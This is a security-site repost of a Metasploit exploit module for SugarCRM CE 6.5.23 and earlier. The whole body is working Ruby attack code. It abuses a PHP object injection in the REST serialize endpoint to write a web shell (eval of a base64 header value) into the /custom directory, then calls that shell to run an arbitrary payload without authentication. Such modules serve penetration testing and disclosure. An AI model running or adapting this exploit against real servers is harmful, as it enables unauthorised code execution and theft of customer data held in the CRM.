首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
SugarCRM 6.5.23 - REST PHP Object Injection Exploit (Metasploit)
来源:metasploit.com 作者:EgiX 发布时间:2016-09-08  
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper
 
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'SugarCRM REST Unserialize PHP Code Execution',
      'Description'    => %q{
        This module exploits a PHP Object Injection vulnerability in SugarCRM CE <= 6.5.23
        which could be abused to allow unauthenticated users to execute arbitrary PHP code with
        the permissions of the webserver. The dangerous unserialize() call exists in the
        '/service/core/REST/SugarRestSerialize.php' script. The exploit abuses the __destruct()
        method from the SugarCacheFile class to write arbitrary PHP code into the /custom directory.
      },
      'Author'         => 'EgiX',
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['URL', 'http://karmainsecurity.com/KIS-2016-07'],
          ['URL', 'http://www.sugarcrm.com/security/sugarcrm-sa-2016-001'],
          ['URL', 'http://www.sugarcrm.com/security/sugarcrm-sa-2016-008'],
          ['URL', 'https://bugs.php.net/bug.php?id=72663']
        ],
      'Privileged'     => false,
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Targets'        => [ ['SugarCRM CE <= 6.5.23', {}] ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jun 23 2016'
      ))
 
      register_options(
        [
          OptString.new('TARGETURI', [ true, "The base path to the web application", "/sugarcrm/"])
        ], self.class)
  end
 
  def exploit
    upload_php = '/custom/' + rand_text_alpha(rand(4)+8) + '.php'
 
    payload_serialized =  "O:+14:\"SugarCacheFile\":23:{S:17:\"\\00*\\00_cacheFileName\";"
    payload_serialized << "s:#{upload_php.length+2}:\"..#{upload_php}\";S:16:\"\\00*\\00"
    payload_serialized << "_cacheChanged\";b:1;S:14:\"\\00*\\00_localStore\";a:1:{i:0;s:55"
    payload_serialized << ":\"<?php eval(base64_decode($_SERVER['HTTP_PAYLOAD'])); ?>\";}}"
 
    print_status("#{peer} - Exploiting the unserialize() to upload PHP code")
 
    res = send_request_cgi(
    {
      'uri'    => normalize_uri(target_uri.path, 'service/v4/rest.php'),
      'method' => 'POST',
        'vars_post' => {
          'method'     => 'login',
          'input_type' => 'Serialize',
          'rest_data'  => payload_serialized
        }
    })
 
    if not res or res.code != 200
      print_error("#{peer} - Exploit failed: #{res.code}")
      return
    end
 
    register_files_for_cleanup(File.basename(upload_php))
 
    print_status("#{peer} - Executing the payload #{upload_php}")
 
    res = send_request_cgi(
    {
      'method'  => 'GET',
      'uri'     => normalize_uri(target_uri.path, upload_php),
      'headers' => { 'payload' => Rex::Text.encode_base64(payload.encoded) }
    })
 
    if res and res.code != 200
      print_error("#{peer} - Payload execution failed: #{res.code}")
      return
    end
  end
end
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·TeamViewer 11.0.65452 (64 bit)
·Adobe ColdFusion < 11 Update 1
·Multiple Applications - Local
·Apache/mod_ssl OpenSSL < 0.9.6
·WIN-911 7.17.00 - Multiple Vul
·Dropbox Desktop Client 9.4.49
·glibc - getaddrinfo Stack Base
·LogMeIn Client 1.3.2462 (64bit
·MySQL 5.5.45 (64bit) - Local C
·Apple iCloud Desktop Client 5.
·Navicat Premium 11.2.11 (64bit
·Zabbix 2.0 - 3.0.3 - SQL Injec
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved